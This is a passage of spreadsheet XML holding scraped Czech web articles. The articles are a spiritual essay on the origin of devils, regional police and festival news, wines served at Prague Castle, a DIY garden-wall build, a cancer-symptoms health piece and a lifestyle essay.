každá duše po odložení fyzického těla určitou tíž. Čím je ušlechtilejší a lepší, tím je tíž menší, a čím je duše zkaženější a negativnější, tím je tíž větší. A tak, na základě zákona duchovní tíže, klesají duše zatížené nízkostí do nízkých úrovní jemné hmotnosti a naopak, duše nadlehčené ušlechtilostí stoupají do vysokých úrovní jemné hmotnosti. Tam se dále zušlechťují v konání dobra a v ctnostech, aby nakonec, po dosažení lidské dokonalosti, mohli vstoupit z jemné hmotnosti do věčného, duchovního království nebeského. K pochopení, odkud pocházejí čerti, je třeba vědět, že čím je duše zkaženější a nižší, tím ohyzdnější vnější formu dostává. A naopak, čím je duše ctnostnější a lepší, tím je její vnější forma ušlechtilejší a krásnější. Potvrzení fungování této zákonitosti můžeme najít už tady na zemi, když například někdo enormním způsobem holduje alkoholu a jeho neřest časem začíná být viditelná i na jeho vnějším vzhledu. A podobně je to také s drogami. No a po naší smrti, ve světě jemné hmotnosti, se tato zákonitost mnohokrát znásobuje. To znamená, že jakákoli neřest a nízkost se mnohem očividněji odráží na vzhledu duševního, jemnohmotného těla každého jednotlivce. Čím je tedy někdo horší, tím ohyzdnější podobu má jeho jemnohmotné tělo. A jde to až tak daleko, že lidé ztrácejí svou lidskou podobu a stávají se z nich polo zvířecí a pololidské, strašidelné a ohyzdné bytosti. Čerti tedy nejsou žádný nový a zvláštní druh. Čerti jsou ve skutečnosti lidé, nelidsky znetvořeni vlastní nízkostí. Stejný princip však platí také v pozitivním slova smyslu, protože jemnohmotná těla lidí ušlechtilých, čestných, spravedlivých, dobrých a laskavých nabývají ušlechtilé a vznešené formy, podobající se formám andělským. Takže aby nám bylo všem jasné, čerti jsou ve skutečnosti nízké, padlé a ubohé lidské duše, nacházející se v nízkých úrovních jemné hmotnosti. Sem se kontaktovat, sem se orientovat, odtud se inspirovat a na náš svět přinášet průvody těchto nízkých, nešťastných, znetvořených a nejrůznějšími neřestmi spoutaných bytostí, není rozhodně nic pozitivního. Je to jen ubohé a politování hodné spojování se s nízkostí. Není to nic pozitivního, na co by se měli lidé orientovat. Lidé by se měli orientovat opačným směrem. Ne tedy dolů, ale vzhůru! Ne do nížin, ale do výšin! Tam, ve vysokých úrovních jemné hmotnosti, přebývají ušlechtilé a ctnostné lidské duše, jejichž ušlechtilá vnější duševní forma je výsledkem jejich života v souladu s principy dobra, lásky, spravedlnosti a ušlechtilosti. Tím směrem by bylo žádoucí se orientovat a inspirovat! Ne tedy do nížin, ale k výšinám máme upírat svůj zrak! Odtud máme čerpat a přinášet to sem dolů k nám na zem, aby se naše planeta stávala stále lepší, a ne stále horší. Autor: Milan Šupa Autor Milan Šupa</t>
  </si>
  <si>
    <t>28290</t>
  </si>
  <si>
    <t>20241101_32_3264427137_78bca1f700f320e51224.html</t>
  </si>
  <si>
    <t>78bca1f700f320e51224</t>
  </si>
  <si>
    <t>Mladiství pili ve Znojmě alkohol i tam, kde se nesmí</t>
  </si>
  <si>
    <t>Shrnutí Mladiství pili ve Znojmě alkohol i tam, kde se nesmí Publikováno Od Karel Janovský ilustrační foto: MP Znojmo ZNOJMO – Minulý pátek proběhla společná akce Policie ČR a Městské policie Znojmo zaměřená na problematiku konzumace alkoholických nápojů a jiných omamných látek rizikových věkových skupin a také na veřejný pořádek ve Znojmě . V e Znojmě minulý pátek s trážníci a policisté zkontrolovali sedm podniků, ve kterých se prodával a konzumoval alkohol . Zaměřili se také na problémové lokality včetně parků v oblasti centra města Znojma a okolo ulic Holandská a Sokolovská. Při společné akci bylo zjištěno 12 osob mladších 18 let, které byly pod vlivem alkoholu . Hlídky provedly i kontroly heren. Výsledky kontroly nebyly potěšující. Strážníci zjistili pět mladistvých dívek pod vlivem alkoholu . N ěkteré z dívek nadýchaly bezmála 1 promile alkoholu a byly předány do péče rodičů. „ T yto případy budou postoupeny příslušným sociálním odborům. Dále strážníci s policisty zaznamenali t ři porušení vyhlášky 6/2024 města Znojma , která zakazuje konzumaci alkoholu na vymezených veřejných prostranstvích. Tyto přestupky byly ohodnoceny pokutami v hodnotách 500 Kč, 1000 Kč a 5000 Kč,“ prozradila mluvčí znojemských strážníků Eva Veselá. Staňte se členy FB skupiny Život v Jihomoravském kraji a žádná zpráva z kraje vám neunikne. Sledujte nás na síti X, kde pro vás připravujeme plejádu pestrých zpráv. Celý článek zde: ZDROJ ZDE ….✅ REKLAMU ✅ můžete mít zde například formou zpětného odkazu více: Ceny reklamy …. Autor: Karel Janovský Autor person Karel Janovský</t>
  </si>
  <si>
    <t>20241101_320_3265000606_081ebee1e72f9c8cd248.html</t>
  </si>
  <si>
    <t>081ebee1e72f9c8cd248</t>
  </si>
  <si>
    <t>Rychlost? - žádný problém</t>
  </si>
  <si>
    <t>Rychlost? - žádný problém POLICIE ČR územní odbor Jihlava 01.11.2024 KRAJ - "Dálničáři" z Hořic kontrolovali dodržování rychlostí. O uplynulém víkendu se „dálničáři“ z Hořic zaměřili na kontrolu dodržování nejvyšší dovolené rychlosti na Jičínsku, přičemž odhalili 4 řidiče, kteří si s „rychlostí“ zřejmě nedělají hlavu. V Úbislavicích policisté změřili 63letého řidiče vozidla Audi , který jel mimo obec 156 km/h, přičemž je zde stanovená maximální rychlost 90 km/h. Dalšího 36letého „piráta“ ve vozidle Ford změřili v Robousích, když opět mimo obec „uháněl“ rychlostí 148 km/h. RychlostiV odpoledních hodináchv sobotu „dálničáři“ v obci na „50tce“ v Podhorním Újezdu změřili řidiče ve Volkswagenu , který se „řítil“ rychlostí 103 km/h, navíc vozidlo nemělo platnou technickou prohlídku. Posledního řidiče zkontrolovali opět v Úbislavicích, když mimo obec jel rychlostí 155 km/h. Všichni řidiči se na výzvu policistů podrobili orientační dechové zkoušce na alkohol s negativním výsledkem. Všem řidičům policisté zadrželi řidičské oprávnění a zakázali další jízdu. Ve správním řízení jim hrozí pokuta od 7 do 25 tisíc korun a zákaz řízení od 6 do 18 měsíců. por. Pižlová Šárka, DiS. Autor: POLICIE ČR územní odbor Jihlava || https://www.regionhradec.cz/</t>
  </si>
  <si>
    <t>20241101_321_3242902139_998ed0efb6f5d81bf72f.html</t>
  </si>
  <si>
    <t>998ed0efb6f5d81bf72f</t>
  </si>
  <si>
    <t>První zprávy - Rybářské slavnosti na Hluboké vyšly na jedničku</t>
  </si>
  <si>
    <t>První zprávy - Rybářské slavnosti na Hluboké vyšly na jedničku Rybářské slavnosti na Hluboké vyšly na jedničku regiony Tisíce lidí využily překrásného počasí a vyrazily na hráz téměř 120hektarového Munického rybníka v Hluboké nad Vltavou , kde se o státním svátku 28. října konaly tradiční Rybářské slavnosti, spojené s podzimním výlovem. Rybářské slavnosti na Hluboké 30. října 2024 - 07:30 Hlavní zátah začal už v sedm hodin ráno, rybáře v akci ale sledovali diváci ze zaplněné hráze po celé dopoledne. Mezi stánky, z nichž se linula vůně rybích specialit, se davem návštěvníků proplétala také Anna Jindrová , která si ke stolku právě odnášela kapří hranolky a rybí polévku. „Je to tu úžasné, vyrazili jsme sem s rodinou z Českých Budějovic ,“ svěřila se. „Vnuk Tomášek miluje vlaky, má rád rybáře a rybičky, a tak jsme toho využili a udělali si na Hlubokou pěkný výlet.“ Vůbec poprvé na vlastní oči viděla výlov rybníka Barbora Reinerová z Brna , která trávila v jižních Čechách dovolenou. „Je to fantastický zážitek, překrásné to bylo,“ popsala. „Celý život se na výlovy koukám v televizi a teď jsem si řekla, že to musím vidět, a jelikož se to trefilo na podzimní prázdniny, mohli jsme si udělat výlet na Hlubokou. Navíc jsme tady ochutnali skvělou rybu a místní pivo . Prostě krása.“ Letos přišel s výlovem na řadu Munický rybník, příští rok se budou Rybářské slavnosti konat na Bezdrevu. „Střídá se to tak každý rok a s výlovem je vždy spojený kulturní program,“ vysvětlila Valerie Chromá, která rybářské slavnosti organizuje už přes deset let. „Na začátku programu zástupce ředitele Rybářství Hluboké přivítal účinkující i diváky, pak publiku zazpíval dětský pěvecký sbor Slavíčci ze základní školy Hluboká, o muziku se letos postarali Kobři, českobudějovická country kapela, a šéfkuchař Vladimír Tůma přiblížil renesanční kuchyni. Předvedl, jak se připravuje schwarzenberský rybí salát.“ Jedním dechem Valerie Chromá dodala, že Rybářské slavnosti na Hluboké se i letos mohly konat díky Nadaci ČEZ , která na tuto tradiční a hojně navštěvovanou kulturní akci v rámci Oranžového roku dává finance. Jihočeskénovinky.cz informoval Marek Sviták, tiskový mluvčí Jaderné elektrárny Temelín , ČEZ, a. s. (jv,jihoceskenovinky.cz foto:ete, m.sviták)</t>
  </si>
  <si>
    <t>20020</t>
  </si>
  <si>
    <t>24440</t>
  </si>
  <si>
    <t>20241101_322_3242894400_25d136b655c0a6cf356b.html</t>
  </si>
  <si>
    <t>25d136b655c0a6cf356b</t>
  </si>
  <si>
    <t>Výjimečná vína pro výjimečné lidi</t>
  </si>
  <si>
    <t>Výjimečná vína pro výjimečné lidi Na předávání státních vyznamenání prezidentem 28. října ani letos nechyběla vína z Moravy a vína z Čech . Ve Španělském sále Pražského hradu si zhruba tisícovka hostů mohla vychutnat celkem devět vín z aktuální kolekce Salonu vín. Pohoštění pro oceněné věnoval Vinařský fond. Na předávání státních vyznamenání si hosté připíjeli tím nejlepším od moravských a českých vinařů „ Pro Vinařský fond je velkou poctou, že může oceněným lidem na slavnostním ceremoniálu nabídnout výběr ze stovky nejlepších vín naší země. Těší nás, že se to už stalo tradicí. Naše vinařství má více než tisíciletou historii a naše vína jsou proto tím správným nápojem pro takový okamžik ,“ řekl ředitel Vinařského fondu Zbyněk Vičar. Fond vína nakoupil ze Salonu vín, který spravuje Národní vinařské centrum. To zajistilo i jejich náležitou prezentaci na místě. „ Jsme velmi rádi, že si i letos si chvilku na ochutnání našel pan prezident. U vína jsme si popovídali například se Zlatou Adamovskou a Petrem Štěpánkem a o své zkušenosti s prezentací vína se s námi podělil pan Ladislav Špaček , “ popsal výjimečné okamžiky ředitel Národního vinařského centra Lubomír Maťák Vína na hradě hostům rozlévali zástupci vinařství v čele s národní someliérkou Klárou Kollárovou. „Selekce byla, jak je již zvykem, z vín Salonu vín ČR. Josef a Marek Svobodovi představili své rosé, zatímco Petra a Kamil Prokešovi nabídli svou Frankovku. U bílých vín byly zastoupeny hlavně naše typické odrůdy – Veltlínské zelené, Müller Thurgau, Ryzlink vlašský, Ryzlink rýnský a Pálava – a také rosé a tři červená,“ uvedla k akci v Senátu národní sommelierka Klára Kollárová. „ U příležitosti státního svátku České republiky a předávání státních vyznamenání prezidentem České republiky jsme měli tu čest reprezentovat výběr Salonu vín Frankovkou 2021, pozdní sběr, která je zařazena mezi 100 nejlepších vín České republiky . Bylo nám ctí se této slavnostní recepce, kde naše víno ochutnalo mnoho významných a známých osobností, kteří ocenili vysokou úroveň nabízených vín, zúčastnit “ uvedl Kamil Prokeš Kamil Prokeš vinařství ve Velkých Pavlovicích . Vinný lístek na slavnostní recepci na Pražském hradě zahrnoval Veltlínské zelené 2021, pozdní sběr ze Zámeckého vinařství Bzenec , Müller Thurgau 2022, pozdní sběr z vinařství Znovín Znojmo, Ryzlink vlašský 2022, pozdní sběr z vinařství Mikrosvín Mikulov, Ryzlink rýnský 2021, pozdní sběr z Víno Mikulov , Pálava 2022, výběr z hroznů z vinařství Štěpán Maňák, André rosé 2022, pozdní sběr z Vinařství Svoboda, Frankovka 2021, pozdní sběr z vinařství Kamil Prokeš , Alibernet 2021, pozdní sběr z vinařství Stanislav Konečný a Cabernet Moravia 2021, výběr z hroznů z Vinařství U Kapličky. Salon vín – Národní soutěž vín ČR je finální soutěží systému Národní soutěže vín. V rámci soutěže je každý rok vybráno nejlepší víno s titulem “Šampion”, dále “Vítězové kategorií” a “Nejlepší kolekce”. Sto nejlepších vín soutěže je oceněno zlatou medailí Salonu vín ČR. Na vlastní soutěž navazuje celoročně otevřený veřejný degustační Salon vín – expozice nejlepších sta vín, umístěná ve sklepních prostorách státního zámku ve Valticích , která já návštěvníkům otevřena vždy od února do prosince. O Vinařském fondu Vinařský fond byl zřízen zákonem o vinohradnictví a vinařství v roce 2002. Vzorem byly obdobné instituce v sousedních vinařských zemích ( Německu a Rakousku ). Hlavní náplní jeho činnosti do vstupu ČR do EU byla podpora výsadby vinic. Od roku 2004 Fond podporuje marketing vína , rozvoj vinařské turistiky a informuje veřejnost o vinohradnictví a vinařství. Stěžejní aktivitou Fondu je komunikační kampaň značky „ Vína z Moravy , vína z Čech ,“ která zastřešuje vína domácí produkce. Speciálním a velmi úspěšným projektem je „Svatomartinské,“ tj. uvedení mladých vín pod společnou značkou na trh každoročně 11. 11. Další komunikační aktivity v rámci kampaně „ Vína z Moravy , vína z Čech “ se soustředí na propagaci růžových, resp. červených vín. Fond dále podporuje realizaci řady akcí spojených s vinařskou tematikou po celé republice (výstavy, vinobraní, otevřené sklepy, semináře, tiskoviny atd.). Matej Senft Autor: Redakce Rubrika transition_slide Gastronomie</t>
  </si>
  <si>
    <t>20241101_323_3242901670_e5a1b74bd5434e06a5e8.html</t>
  </si>
  <si>
    <t>e5a1b74bd5434e06a5e8</t>
  </si>
  <si>
    <t>Muž v&amp;nbsp;Brně byl tak opilý, že na něj nestačil alkoholtester</t>
  </si>
  <si>
    <t>Muž v&amp;nbsp; Brně byl tak opilý, že na něj nestačil alkoholtester Muž v Brně byl tak opilý, že na něj nestačil alkoholtester Nevěřícně zůstali hledět na displej přístroje určeného k měření alkoholu brněnští strážníci, kteří ve čtvrtek v poledne spěchali k notně podroušenému muži, jenž podřimoval u tramvajových kolejí v Řečkovicích . Přístroj totiž po opilcově mocném fuku napsal, že tak vysokou hodnotu nedokáže zobrazit. S takovým případem se strážníci ještě nesetkali. Situace se odehrála na řečkovické tramvajové smyčce poté, co si asistenci strážníků vyžádal řidič jedné ze šalin. Opilec se totiž povaloval v těsné blízkosti kolejí. Řidič za pomoci jednoho z cestujících muže proto odtáhl kousek stranou, ale měl strach, aby se za pár chvil neodkulil zase zpět do nebezpečného prostoru. „Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile,“ kroutil hlavou mluvčí strážníků Jakub Ghanem. Hlídka proto opilci zavolala záchranku a po nějaké době zkusila test ještě jednou. „Přístroj zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice,“ dodal Ghanem. Muži nyní hrozí ve správním řízení pokuta až dvacet tisíc korun podle tzv. tabákového zákona za to, že se opilý zdržoval na nástupišti hromadné dopravy. Autor: Petr Kozelka Autor Petr Kozelka</t>
  </si>
  <si>
    <t>20241101_324_3264960034_bdd6d3dfe5fca058d644.html</t>
  </si>
  <si>
    <t>bdd6d3dfe5fca058d644</t>
  </si>
  <si>
    <t>Za jízdu pod vlivem až pět let. Japonsko vytáhlo do boje s nebezpečnými cyklisty Pokutu až 152 tisíc korun či dokonce pětiletý trest vězení mohou v Japonsku nově dostat cyklisté , kteří budou při jízdě používat mobilní telefon nebo pojedou pod vlivem alkoholu a způsobí nehodu. Nový zákon vešel v platnost v pátek a už má první uplatnění.... Celý článek naleznete na: www.lidovky.cz/... Autor: Lidovky.cz</t>
  </si>
  <si>
    <t>20241101_325_3250239447_ea9b9120fbe2397594ef.html</t>
  </si>
  <si>
    <t>ea9b9120fbe2397594ef</t>
  </si>
  <si>
    <t>Oddělovací stěna na zahradu</t>
  </si>
  <si>
    <t>Oddělovací stěna na zahradu Věřím tomu, že řada z vás má určitě prostor, kde je potřeba oddělit od sebe třeba část pozemku, anebo se oddělit od pozemku souseda. Tahle kůlna přijde zbourat a mě napadlo do tohohle místa udělat stěnu a jakousi letní kuchyň, protože když se dívám, tak tady gril, ten už to má taky trošku za sebou, tak to prostě vytuníme a trošku tomu dáme nový kabát. No nic, já jdu měřit, plánovat a vy vítejte u Libovek. Ta hranice pozemku bude někde tady za těma prvníma taškama, to znamená, že tady musíme sundat trochu střechy, ale napadá mě, že bychom si mohli tady tu část rozdělit, je to 4,80, takže tady vlastně do tohoto místa na 2,40 dáme jeden sloupek, no, a jeden dáme tady úplně do kraje. Necháme tam ještě vůli, protože v tom je plot, který se jednou taky zbourá. Mám tři zemní vruty, použijeme stejný KVH hranoly 10 na 10, jako když jsme dělali houpačku, což znamená, že potřebujeme třikrát cca 2 m, záleží, jak chcete potom tu stěnu mít vysokou, ale já bych to viděl, že opravdu 2 m je max. Je to jen proto, abychom si se sousedama tady potom tak jako nedělali problémy. Nemyslím tím jako fyzicky, ale jako že můžete si tady povídat a on si tam může řešit svoje. Tak jako slunečnice každým dnem, ještě si trošku užijem u souseda, za chvíli to zavřeme a je, jak se říká, po ptákách. Jo, a ještě potřebujeme plotovky dvakrát po 2,40 m na výšku, ty 2 m a vezmeme šířku 8,9 cm. Tašky musí dolů. Jedna, dva, Honza jde, já je schovám, kdyby ještě někde byly potřeba, ale to jsou už takový za zenitem. Vezmeme ocasku, někdo tomu říká zlodějka, rozřízneme latě. Kopřivečky, kopřivy. Musím tady vystříhat, jak když si jdu pro Šípkovou Růženku, člověče, gril tady zarostl pětiprsťákem, tak tomu já osobně říkám, ale to roste jak (???). Do kolečka a do místního kontejneru to máte určitě u vás v obci taky. Malá ruka, já jsem velká ruka, ne. Je vidět, že zřejmě syn s babičkou o víkendu stříhali, když to otřepili na malou ruku. Zameteme. Takhle, teď to vypadá, že tu metu k sousedovi, ale samozřejmě tady je ještě stále nepořádek, tak je potřeba to vrátit zase tu zem, odkud přišla, že jo. To první dáme do rožku tady vrut, stačí trošku zapíchnout, případně doklepneme a budeme točit a doufám, že to tam půjde zatočit, že tady není beton. Nasadíme kus nějakého hranolku a točíme. To je trošku komplikace, že je tady ještě stále ten plot, ale nedá se nic dělat, člověk si nevybírá. Dal jsem si jeden hranol KVH 10 na 10 do těch patek, za prvý chytneme tím dobře směr a za druhé, víme, o kolik jsme zatočili, abysme byli takhle ve vodě, jo, myslím jako ve váze, vodorovně, tak se tomu říká. Můžete být v Dobrý Vodě nebo ve Starý Vodě. Teď si označíme střed. Takhle, tohle by bylo dobrý, ale já potřebuju přesně to mít tady na středu, takže ten hřebík si tam radši podržím postaru prstama, navlíkneme provázek a označíme si bod, kde musí být střed té naší patky. Nasadíme na střed, aby se to tady otáčelo je potřeba a narazíme do země. Trošku topěj. Vždycky mám srdce, dneska kočička. Tady jsem si přinesl takovejhle hranolek, to bude na proklady, mám 1,5 přesně tady tu šířku a bude to 19 mezer, když to celé vynásobíme, tak potřebuju říznout ty tři hranoly na 190. Ořežeme hloubkový značkovač. Jedna z chyb, která se dělá, když řežeme pokoskou, je, že tu pilu nenecháme roztočit, když začínáme řezat, prostě nejdřív musí nabrat obrátky a pak řežu a jde to jak po másle. Máme nařezáno a musíme začistit hrany tak, jak už to známe horní frézkou, fréza pod 45 stupni s vodícím kolečkem. Pitnej režim, je vedro. Protože si pamatujeme, že brus je základ úspěchu, tak vezmeme excentrickou brusku a musíme všechny ty hranoly přebrousit, abysme otevřeli pryskyřicové kanálky. Já jsem si tady uřízl takovej, dá se říct, skoro pivní tácek a po letech se to zlomilo. Ale je to jenom na to, abych si tady dal podložku, protože je dobrý, aby ten trámek nikdy neseděl úplně až na tom železe, aby tam mohla odtékat voda. Tady to vypadá, že to drží samo, ale musíme to zvážit a přišroubovat. Tady vlastně krása střídá nádheru, si říkám. Beru podložku a hurá na druhej sloupek. Už jenom došroubujeme, dáme poslední stojku, ona je teda trošku složitější, ale já myslím, že si s tím poradíme. Teď už jen motám provázek, protože základna je vyřešená a jdeme se pustit do plotovek. Já tady jednu jsem si takhle připravil a ukážeme si teďka, jak se to dá na pokosce porychtovat. 127,5. Možná si říkáte, proč tu mám ten hranolek, ale to je právě kvůli tomu dlabání, protože ta pila je kulatá a vy potřebujete to dostat do místa, kde je nejhlubší bod toho pilového kotouče. Teď potřebujeme ten kotouč si nastavit do tý nejvyšší hloubky toho prořezu a tady na pokosový pile si to dotáhneme pomocí toho šroubu, ten takhle zajistíme. Budeme teď řezat tam a zpátky a takhle popotahovat tu plotovku směrem doleva. Základ je položen, jdem to tam šroubovat. Tady jsem si nařezal ty prokladky tak zhruba 40 cm, to je ta 1,5, tedy 1,5 centimetru. Vytáhnu ty proklady a dáme je zase tady seshora. Tady ještě doprostřed přijde svlak, tím se to hezky dorovná. Je skvělý mít automatický podavač těch prken. Vy tady stojíte a řežete a druhej vám to podává. Musí se najít nějakej dobrej šikovnej člen z rodiny a radím vám, pochvalte ho a pojede to. Jako víno .No, ještě na druhé straně a můžeme se pustit do natírání. Ale když se půjdu podívat i z druhé strany. Mám tady antracitovou glazuru 3v1, aby to všecko ladilo. No, a natíráme štětcem. První nátěr je hotov. Teďka už můžu v podstatě plánovat, co sem přijde. Já jsem si říkal, že žijeme v době, kdy řada z nás umí něco udělat, a tak by to mělo vypadat, že když někdo umí tohle, tak ten druhý dělá něco jiného a mezi sebou si to potom můžeme sharovat, proto vlastně kdysi dávno vznikal výměnný obchod, takže tady do toho místa přijde hotový pult do kuchyně, do kterýho si vyříznu díru pro gril, pro keramický gril, takový vajíčko. Teď to ale musíme nechat zaschnout a poté natřít ještě jednou. Kdybych vám mohl teďka přenést tu vůni, ještě nejsem vyzbrojen, tak to podeberu lžícema, teď jsem spokojenej. Už se úplně těším. Říkal jsem, že dneska není třeba, abychom všechno vyráběli, gril asi vyrábět nebudu a kuchyně, to je docela rychlovka, takže postavíte zeď, dáte nad to plachtu proti slunci a pizza už se nese na stůl. Dneska pizza. Teď se snížím teplotu a ještě možná se pustím do chleba, no, nic, já se jdu do toho pustit. A jestli vy se pustíte do takový venkovní kuchyně, tak ať se vám vydaří. A zase příště u Libovek. Pizza podle mého gusta. Pokud máte na pozemku několik různých zón, které je potřeba od sebe oddělit, nemusíte hned stavět ploty. Postačí oddělovací stěna, upevněná na zemních vrutech, která bude podle potřeby rozmontovatelná. Do patek čili zemních vrutů se upevní KVH hranoly a samotná stěna bude ze spárovky. Nutný je také nátěr, který prodlouží životnost dřeva a celá stěna bude vyladěná do nejmenšího detailu. Pořad: Libovky Pepy Libického</t>
  </si>
  <si>
    <t>20241101_326_3264608876_c0836fa456496c5883ea.html</t>
  </si>
  <si>
    <t>c0836fa456496c5883ea</t>
  </si>
  <si>
    <t>Tyto příznaky se objevují 6 měsíců před rakovinou u 900 lidí. Patří mezi ně i kašel</t>
  </si>
  <si>
    <t>Tyto příznaky se objevují 6 měsíců před rakovinou u 900 lidí. Patří mezi ně i kašel prevence, příznaky, rakovina, zdraví Když člověk slyší slovo rakovina, má husí kůži a je rád za své zdraví. Pokud takovou diagnózu slyší člověk přímo osobně nebo u někoho v blízkém okolí, určitě mu to dokáže život otočit vzhůru nohama. Protože ví, že ne všechno musí být jako doposud. Rakovina si nevybírá. Tato nemoc může postihnout opravdu každého bez rozdílu. “ Rakovina je civilizační onemocnění a na nárůstu počtu nových případů se podílí nezdravý životní styl – nedostatek pohybové aktivity, obezita, nezdravé stravovací návyky a složení stravy, nedostatek čerstvého ovoce a zeleniny, zvýšená konzumace červeného masa, kouření, nadměrná spotřeba alkoholu , stres. Nelze opominout i znečistěné životní prostředí,” uvedl přednosta Onkologické kliniky 1. lékařské fakulty Všeobecné fakultní nemocnice a ÚVN v Praze Luboš Petruželka . Zdravý životní styl nás může ochránit i před nemoci. Zdroj: Shutterstock Mezi nejhorší rakoviny stále patří rakovina prsu, touto zákeřnou nemocí onemocní ročně cca sedm tisíc žen, přestože lékaři nebo zdravotní pojišťovny se snaží ženy přesvědčit k včasným prohlídkám. Ženy mají strach, muže odrazuje vyšetření Někdy mají ženy pocit, že se jich onemocnění nemůže týkat, ale většina se spíše bojí, že by nějaký ultrazvuk nebo mamograf mohl ukázat skutečně nějaké onemocnění. Jenže lékaři upozorňují, že právě malé nerozeznatelné bulky, které odhalí tyto přístroje, mají největší úspěšnost léčby. “Pravděpodobnost vyléčení je vysoká i díky tomu, že dnešní metody léčby jsou moderní a šetrné,“ řekl Vít Ulrych z onkologického centra Multiscan v Pardubicích . Ale na pozoru by měli být i muži, jelikož rakovinou prostaty onemocní na sedm tisíc mužů ročně. Muže od preventivního vyšetření odrazuje způsob vyšetření. Sice se pravděpodobnost onemocnění zvyšuje s věkem, ale dnes není výjimkou, že toto onemocnění nemine ani muže mladšího věku. „Díky moderním přístrojům, které jsme v posledních letech pořídili, našim dlouhodobým zkušenostem a novým kombinacím metod, jsme v léčbě nádoru prostaty stále úspěšnější. Léčba rakoviny prostaty radioterapií, tedy zářením, se v uplynulých letech posunula významně dopředu. Pokročilé formy radioterapie totiž šetří více zdravé tkáně v okolí prostaty a tím klesá výskyt nežádoucích účinků léčby,“ uvedl dále Ulrych. Všichni odborníci se shodují, že nejlepší prevencí je včasné a preventivní pravidelné vyšetření. Také bychom neměli ignorovat některé příznaky, které nám mohou přijít jako banální. Včasná návštěva lékaře je velmi důležitá. Zdroj: Shutterstock Příznaky, které nám pomohou odhalit rakovinu včas Rakovina v těle nevznikne přes noc, ale roste v našem těle nějakou dobu. Během této doby už nás mohou provázet příznaky, které se mohou zdát sice jako velmi banální, ale pokud tyto příznaky nepodceníte, je možné, že si ušetříte spousty starostí navíc. Zvláště pokud tyto příznaky nás provázejí opakovaně delší dobu. Podle výzkumu odborníků se 6 měsíců před propuknutím rakoviny objevovalo u 900 lidí několik stejných příznaků. Kromě níže zmíněných se jednalo například také o kašel nebo o bouli na těle (hrbol). Dejte si pozor zejména na tyto příznaky: neobvyklá únava, nevysvětlitelná ztráta hmotnosti bolest – neustálá nebo zhoršující se bolest zejména na místech, která vás nikdy netrápila změny na kůži problémy s trávicím systémem a kašel změny v močení nevysvětlitelné krvácení problémy s prsy Důležité je si ale uvědomit, že i psychika člověka je půl zdraví. Zbytečně se nestresujte a život si užívejte, dbejte na prevenci a zdravý životní styl. Zdroje: cnn.iprima.cz, novinky.cz, mojezdravi.cz, tyden.cz, sanook.com, nempk.cz [seznam-ads id="17779"] [seznam-ads id="17778"] [seznam-ads id="17778"] [seznam-ads id="17898"] Opakující symptomy nás mohou upozornit na nemoc.: Shutterstock Foto:</t>
  </si>
  <si>
    <t>20241101_327_3264931484_42876626ba59c3df6873.html</t>
  </si>
  <si>
    <t>42876626ba59c3df6873</t>
  </si>
  <si>
    <t>Jak si v dnešní uspěchané době užít život naplno, a přitom se nezbláznit</t>
  </si>
  <si>
    <t>Jak si v dnešní uspěchané době užít život naplno, a přitom se nezbláznit autor: Redakce Nezdrave.cz | 01.11.2024 | Lifestyl V hektické realitě dnešních dnů, kde se jedni snaží o kariérní úspěch a druzí touží po maximálně výživném zážitku, se zdá, že umění vychutnat si každý okamžik se vytrácí jako pára nad hrncem. Nikdo z nás není bez povinností a tlaků, ale co kdybychom se zamysleli, jak se vyhnout tomu, abychom se upnuli ke věcem, které nás svazují? Pozorujte kolem sebe, štěstí si většinou sedne na rameno těm, kdo si umí dovolit občas ubrat plyn. A věřte nebo ne, nedávný výzkum ukazuje, že lidé, kteří se naučili užívat si těch „malých věcí“, jsou až o 30 % šťastnější! Čas na chvíli se zastavit a podívat se na to, co nás obklopuje. Kudy se točila pizza, až se z toho zbláznila? Pamatujete si na ten rozčarovaný pohled vašeho souseda, když jste mu ukázali fotku z vaší poslední cesty po Itálii , kdy váš oblíbený pizzaiolo místo posypání bazalky přidal kapku olivového oleje a kousíček parmezánu? Přesně ten moment, kdy si uvědomil, že zahodily šanci prožít pravou italskou tradici, aniž by se vyhnuli zhlubokému olizování prstů. Řekněte si, co milujete a snažte se to vnést do každodenního života. Víno , jídlo, dobrá společnost, to vše vám může přinést radost, aniž byste museli platit astronomické částky za zážitky. A co takhle pomalé vaření? Prozradím vám tajemství: pokud se večer na chvíli zavřete do kuchyně a pustíte si hudbu, zapomeňte na svět a vaření se stane rituálem. Kde je napsáno, že tofu nemůže chutnat lépe než steak? Zkuste to a možná i procházka do obchodu se zeleninou se stane víc než jen nutností… A vy se pak můžete vrátit a po celém dni stráveném v pracovním kolotoči užít si vlastní královský večer. Udržitelnost? Ne, spíše autentický styl Všechno, co se nyní točí kolem udržitelnosti, má své nezařazené místo v našem zhýčkaném životě plném technologií. Víte, že lidé, kteří tráví čas v přírodě, mají mnohem lepší psychické zdraví? Vraťte se k základům a dopřejte svému tělu i ducha čas na regeneraci. Choďte na túry, ať už s rodinou, přáteli nebo prostě sami. Každá trek má svou jedinečnou chuť a s každým odbočením mimo cestu přichází nová zkušenost, která potěší. Čím méně plánujete, tím méně stresu si odnášíte. Co takhle se jednou za čas zamyslet, zda do svých dobrodružství opravdu potřebujete auto? A konečně, forgive me for this, ale co s tím nesmyslným přepracováním? Málokdo si uvědomuje, že „working disability“ je známý termín mezi psychiatrickými odborníky, a když jsme u toho, zrovna teď si jeden z nich láme hlavu nad tím, jestli to, co děláme, má vůbec smysl. Spojte se s lidmi, kteří mají stejný pohled na svět, smějte se a dělejte věci, které máte rádi. Možná je to začátek vašich nových „malých věcí“, na které budete vzpomínat s úsměvem na rtech. Prožívání života naplno rozhodně neznamená jen „carpe diem“, ale také „carpe et indulge“. A pokud se cítíte jako ryba na suchu, pak je na čase vzít si zpět kontrolu nad svým životem a přestat sledovat, co si ostatní myslí. Vymanění se z tlačenice, objevování radostí v maličkostech a užívání si chvílí, které nám přináší náš každodenní život, je vlastně umění. Takže, co říkáte na to dát si tu pizzu a otevřít lahev dobrého vína ? Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_328_3242879051_038b2bb50801d0484651.html</t>
  </si>
  <si>
    <t>038b2bb50801d0484651</t>
  </si>
  <si>
